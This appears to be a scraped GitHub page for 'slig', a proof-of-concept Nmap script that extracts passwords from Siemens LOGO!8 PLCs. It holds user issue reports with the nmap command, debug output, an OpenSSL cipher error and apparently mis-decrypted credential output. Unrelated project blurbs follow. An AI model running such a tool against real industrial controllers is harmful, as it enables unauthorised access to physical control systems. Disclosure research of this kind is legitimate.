syss-research / slig Goto Github PK
View Code? Open in Web Editor NEWSiemens LOGO!8 PLC Password Hacking Proof-of-Concept-Tool
Siemens LOGO!8 PLC Password Hacking Proof-of-Concept-Tool
Hello I've tried that but I'm stopped about SSL: no problem about private key, I'm stopped before, when SSL try to decode the packets from logo.
My enviroment is win7 64 pro, SSL both 32&64 bit 1.1.1d and nmap 7.80.
This is nmap debug output
NSE: Using Lua 5.3.
NSE: Arguments from CLI:
NSE: DEPRECATION WARNING: bin.lua is deprecated. Please use Lua 5.3 string.pack
NSE: Loaded 1 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 1) scan.
Initiating NSE at 15:36
Completed NSE at 15:36, 0.00s elapsed
Initiating ARP Ping Scan at 15:36
Scanning 192.168.1.42 [1 port]
Packet capture filter (device eth0): arp and arp[18:4] = 0x183DA25F and arp[22:2
] = 0xCA7C
Completed ARP Ping Scan at 15:36, 0.64s elapsed (1 total hosts)
Overall sending rates: 1.57 packets / s, 66.14 bytes / s.
mass_rdns: Using DNS server 192.168.0.1
mass_rdns: Using DNS server 192.168.1.1
mass_rdns: Using DNS server 192.168.0.1
Initiating Parallel DNS resolution of 1 host. at 15:36
mass_rdns: 0.10s 0/1 [#: 3, OK: 0, NX: 0, DR: 0, SF: 0, TR: 1]
Completed Parallel DNS resolution of 1 host. at 15:36, 0.04s elapsed
DNS resolution of 1 IPs took 0.10s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF:
0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 15:36
Scanning 192.168.1.42 [1 port]
Packet capture filter (device eth0): dst host 192.168.0.251 and (icmp or icmp6 o
r ((tcp or udp or sctp) and (src host 192.168.1.42)))
Discovered open port 10005/tcp on 192.168.1.42
Completed SYN Stealth Scan at 15:36, 0.01s elapsed (1 total ports)
Overall sending rates: 200.00 packets / s, 8800.00 bytes / s.
NSE: Script scanning 192.168.1.42.
NSE: Starting runlevel 1 (of 1) scan.
Initiating NSE at 15:36
NSE: Starting slig against 192.168.1.42:10005.
00000000 4b 00 09 60 00 00 00 00 00 00 00 00 00 00 00 00 K.............. 00000010 05 60 04 e1 47 fd 91 6a 2e 6f 10 56 f6 1f 16 65 .
..G..j.o.V...e
00000020 f4 a6 7d 76 c0 4a c6 76 89 90 d3 52 67 15 41 bb ..}v.J.v...Rg.A.
00000030 01 42 f4 d0 a6 ea 44 96 55 58 4e fd b5 e9 90 8f .B....D.UXN.....
00000040 9d 9c d2 04 fe f3 12 4e 9a 74 ed d0 d2 4e ab b4 .......N.t...N..
00000050 63 2c e7 96 68 c0 b4 e0 6a 13 63 28 6b 98 46 3a c,..h...j.c(k.F:
00000060 64 1b 9b 21 f1 22 27 c0 91 29 8d d3 30 bc 73 4f d..!."'..)..0.sO
00000070 6e 24 80 0c 8d 92 f2 34 55 58 4e fd b5 e9 90 8f n$.....4UXN.....
00000080 4f b8 c7 ce c5 ce 3b c4 57 fe e9 77 d9 1e d0 7c O.....;.W..w...|
Length: 144 [0x90]
NSE: slig against 192.168.1.42:10005 threw an error!
slig.nse:61: Unknown cipher algorithm: DES-EDE3-ECB
stack traceback:
[C]: in function 'openssl.decrypt'
slig.nse:61: in function slig.nse:34
(...tail calls...)
Completed NSE at 15:36, 0.07s elapsed
Nmap scan report for 192.168.1.42
Host is up, received arp-response (0.0021s latency).
Scanned at 2019-12-08 15:36:09 W. Europe Standard Time for 0s
PORT STATE SERVICE REASON
10005/tcp open stel syn-ack ttl 255
MAC Address: E0:DC:A0:1F:4D:8D (Siemens Industrial Automation Products Chengdu)
Final times for host: srtt: 2125 rttvar: 4000 to: 100000
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 1) scan.
Initiating NSE at 15:36
Completed NSE at 15:36, 0.00s elapsed
Read from C:\Users\User\Desktop\nmap-7.80: nmap-mac-prefixes nmap-payloads nmap-
services.
Nmap done: 1 IP address (1 host up) scanned in 2.71 seconds
Raw packets sent: 2 (72B) | Rcvd: 2 (72B)
[/CODE]
my doubt is about the SSL protocol that seems to be rejected by OpenSSL
thanks in advance to all
This ist the output
`>nmap --script slig.nse -p 10005 192.168.0.201
Starting Nmap 7.93 ( https://nmap.org ) at 2023-11-02 15:40 Mitteleuropõische Zeit
NSOCK ERROR [0.0490s] ssl_init_helper(): OpenSSL legacy provider failed to load.
Nmap scan report for 192.168.0.201
Host is up (0.0048s latency).
PORT STATE SERVICE
10005/tcp open stel
| slig: Gathered Siemens LOGO!8 access details and passwords
| User: xYB
| Password: 20Y
| Enabled: Invalid
| User: ZjzP
| Password: Mt
| Enabled: Invalid
| User: XisD
| Password: 7nHN
| Enabled: Invalid
| User: hgQPB
| Password: RJ
| Enabled: Invalid
| Protection: Invalid
| Program password: gQPgQP
|_MMC serial: _g>\xABQP\xAB\xB6_g>\xABQP\xAB
Nmap done: 1 IP address (1 host up) scanned in 0.38 seconds`
The users and the passwords are strange.
Could it be a problem with the keys?
With this passwords I can not get access to the Logo from the software.
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.